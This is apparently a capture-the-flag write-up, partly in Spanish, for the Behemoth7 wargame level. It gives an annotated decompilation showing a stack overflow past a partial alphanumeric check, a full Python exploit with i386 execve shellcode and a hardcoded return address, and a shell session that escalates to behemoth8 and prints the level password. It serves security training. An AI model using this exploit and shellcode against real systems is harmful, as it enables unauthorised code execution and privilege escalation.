Behemoth7

Recordamos deshabilitar ASLR (requiere root y el cambio no persiste tras reiniciar; sin ASLR desactivado la dirección de pila fija 0xffffd460 que usa el exploit cambiaría en cada ejecución): $ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

/*
 * Ghidra decompilation of behemoth7's main. The binary is 32-bit: pointers
 * are 4 bytes, hence the `param_2 + 4` / `* 4` arithmetic on the argv/envp
 * tables. param_1 = argc, param_2 = argv, param_3 = envp.
 *
 * Intended defence: every character of argv[1] must be alphanumeric (so raw
 * shellcode bytes are rejected) and every environment string is zeroed (so
 * shellcode cannot be staged in an env var).
 *
 * Actual bug: the character check gives up after 0x200 (512) characters, but
 * the strcpy that follows copies the WHOLE of argv[1] into the 512-byte stack
 * buffer local_210. Bytes 513 onward are therefore both unchecked and written
 * past the end of the buffer, over the locals, saved ebp and return address.
 */
undefined4 main(int param_1,int param_2,int param_3)

{
  size_t __n;
  ushort **ppuVar1;
  char local_210 [512];          /* destination of the unbounded strcpy below */
  int local_10;                  /* count of argv[1] characters inspected so far */
  int Contador1;                 /* index into envp */
  char *local_8;                 /* cursor over argv[1] */

  local_8 = *(char **)(param_2 + 4);            /* argv[1]; argc is only checked further down */
  Contador1 = 0;
  /* Zero every environment string in place (strlen bytes, so the NUL
     terminator survives). Shellcode placed in an environment variable is
     wiped; note that argv[2..] are NOT touched by this loop. */
  while (*(int *)(param_3 + Contador1 * 4) != 0) {
    __n = strlen(*(char **)(param_3 + Contador1 * 4));
    memset(*(void **)(param_3 + Contador1 * 4),0,__n);
    Contador1 = Contador1 + 1;
  }
  local_10 = 0;
  if (1 < param_1) {                            /* only when argv[1] exists */
    /* Inspect argv[1], but only its first 0x200 = 512 characters: local_10 is
       incremented before the bound is tested, so exactly 512 characters are
       checked and the loop then falls through even if the string is longer. */
    while ((*local_8 != '\0' && (local_10 < 0x200))) {
      local_10 = local_10 + 1;
      ppuVar1 = __ctype_b_loc();
      /* 0x400 / 0x800 are glibc's _ISalpha / _ISdigit class bits, i.e. the
         inlined isalpha() / isdigit(). Despite the "alpha" in the message,
         digits are accepted too; any other byte aborts the program. */
      if ((((*ppuVar1)[*local_8] & 0x400) == 0) &&
         (ppuVar1 = __ctype_b_loc(), ((*ppuVar1)[*local_8] & 0x800) == 0)) {
        fprintf(stderr,"Non-%s chars found in string, possible shellcode!\n","alpha");
                    /* WARNING: Subroutine does not return */
        exit(1);
      }
      local_8 = local_8 + 1;
    }
    /* Unbounded copy of the full argv[1] into the 512-byte buffer. Anything
       after byte 512 skipped the check above and now overflows local_210 into
       local_10, Contador1, local_8, the saved ebp and main's return address
       (512 + 3*4 + 4 = 528 bytes, matching Ghidra's 0x210 frame offset). */
    strcpy(local_210,*(char **)(param_2 + 4));
  }
  return 0;
}
from struct import *
import sys

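# Exploit for behemoth7: argv[1] is character-checked only for its first
# 512 bytes but then strcpy'd in full into a 512-byte stack buffer, so
# everything after byte 512 is unchecked and overflows main's frame.
#
# Layout of the argv[1] string this script prints:
#   512 x 'A'      fills local_210 and passes the alphanumeric check
#   16 bytes       clobbers local_10, Contador1, local_8 and the saved ebp
#                  (512 + 16 == 0x210, the Ghidra frame offset of the buffer)
#   DIR_SHELLCODE  overwrites main's return address
#   NOP sled +     lands on the stack just past the return address, which is
#   shellcode      where DIR_SHELLCODE has to point
#
# Every byte must be non-NUL (strcpy stops at 0x00) and, because the payload
# is passed through $(python E7.py), must not be IFS whitespace either.
#
# All pieces are kept as bytes so the same octets are emitted under Python 2
# and Python 3: a str literal such as "\x90" would be UTF-8-encoded to two
# bytes by a Python 3 text stdout and silently corrupt the payload.

# i386 execve("/bin//sh", NULL, NULL); 21 bytes, NUL-free.
SHELLCODE = b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
# 512 bytes of buffer + 16 bytes of locals / saved ebp = 528 bytes to the return address.
OFFSET = b"A" * 512 + b"BBBB" * 4
NOP_SLED = b"\x90" * 50
# Stack address inside the NOP sled. Only meaningful with ASLR disabled and
# the same environment/argv size; presumably taken from a debugger session,
# so re-derive it on the target rather than trusting this constant.
DIR_SHELLCODE = pack("<I", 0xffffd460)   # explicit 32-bit little-endian, no NUL bytes
PAYLOAD = OFFSET + DIR_SHELLCODE + NOP_SLED + SHELLCODE

# Emit raw bytes: sys.stdout.buffer on Python 3, sys.stdout itself on Python 2.
_out = getattr(sys.stdout, "buffer", sys.stdout)
_out.write(PAYLOAD)
_out.flush()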
behemoth7@behemoth:/tmp/Marmeus$ /behemoth/behemoth7 $(python E7.py)
$ id
uid=13007(behemoth7) gid=13007(behemoth7) euid=13008(behemoth8) groups=13007(behemoth7)
$ cat /etc/behemoth_pass/behemoth8       
pheewij7Ae
$